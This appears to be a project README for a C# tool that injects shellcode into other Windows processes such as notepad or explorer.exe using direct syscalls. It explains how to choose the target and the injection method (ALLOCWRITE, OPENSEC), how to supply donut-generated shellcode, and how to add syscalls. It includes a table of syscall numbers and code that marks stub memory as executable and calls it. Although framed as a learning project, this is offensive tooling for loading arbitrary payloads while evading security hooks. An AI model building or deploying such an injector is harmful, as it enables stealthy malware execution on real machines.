


Small program written in C#, compatible with .NET >= v3.5 . Only x64. Works from ws 2008 up to the latest windows 10 update.

Created as a way to learn more about direct syscalls and their implementation in C#.

The program uses direct syscalls to perform the shellcode allocation/injection and the remote thread creation. The only imports are GetSystemInfo, RtlGetVersion and VirtualProtectEx.

The shellcode can be easily generated using tools like donut (https://github.com/TheWover/donut/)


Shellcode alloc/injec methods:

By default the program injects into "notepad" using the ALLOCWRITE write method. This can be easily modified by changing line 18

Inject("notepad", osV, ALLOCWRITE);

can be changed to

Inject("explorer", osV, OPENSEC);

to inject the shellcode into explorer.exe using the OPENSEC method.

The shellcode must be in base64 and assigned to the "s" variable on line 91

//msf messagebox x64


Take a look at syscalls.cs. To create a new syscall:

For example, if we would like to implement NtClose we can do the following:

            { "win10-1507", new Dictionary<string, byte>()
                    { "openprocess",0x26},
                    { "allocatevirtualmem", 0x18},
                    { "writevirtualmem", 0x3A},
                    { "createremthread", 0xB3},
                    { "createsection", 0x4A },
                    { "mapviewofsec", 0x28 },
                    { "close", 0x0F }
public struct Delegates{
            public delegate int NtClose(IntPtr handler);
        public static NTSTATUS NtClose(IntPtr handle, string os)
            byte[] syscall = syscallSkeleton;
            syscall[4] = sysDic[os]["close"];

                fixed (byte* ptr = syscall)

                    IntPtr memoryAddress = (IntPtr)ptr;

                    if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress,
                        (UIntPtr)syscall.Length, 0x40, out uint oldprotect))
                        throw new Win32Exception();

                    Delegates.NtClose myAssemblyFunction = (Delegates.NtClose)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtClose));

                    return (NTSTATUS)myAssemblyFunction(handle);
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